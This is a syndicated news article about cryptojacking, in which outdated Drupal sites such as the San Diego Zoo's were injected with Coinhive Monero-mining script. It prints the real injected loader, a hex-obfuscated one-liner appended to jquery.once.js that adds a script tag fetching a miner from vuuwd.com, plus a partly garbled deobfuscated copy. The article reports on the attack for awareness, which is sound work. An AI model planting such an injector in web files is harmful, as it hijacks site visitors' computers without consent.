Sign In  |  Register  |  About Burlingame  |  Contact Us

Burlingame, CA
September 01, 2020 10:18am
7-Day Forecast | Traffic
  • Search Hotels in Burlingame

  • CHECK-IN:
  • CHECK-OUT:
  • ROOMS:

Outdated website software lets hackers mine cryptocurrencies at your expense

An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up […]

An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking. pic.twitter.com/B3rd2Q5uVA

— Bad Packets Report (@bad_packets) May 4, 2018

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of Javascript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.

The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Which, deobfuscated, translates to:

'use strict';
var dZ1 = window["document"]"getElementsByTagName"[0];
var ZBRnO2 = window["document"]"createElement";
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
dZ1"appendChild";

The domain it calls, vuuwd.com, is down.

BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.”

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.

Data & News supplied by www.cloudquote.io
Stock quotes supplied by Barchart
Quotes delayed at least 20 minutes.
By accessing this page, you agree to the following
Privacy Policy and Terms and Conditions.
 
 
Copyright © 2010-2020 Burlingame.com & California Media Partners, LLC. All rights reserved.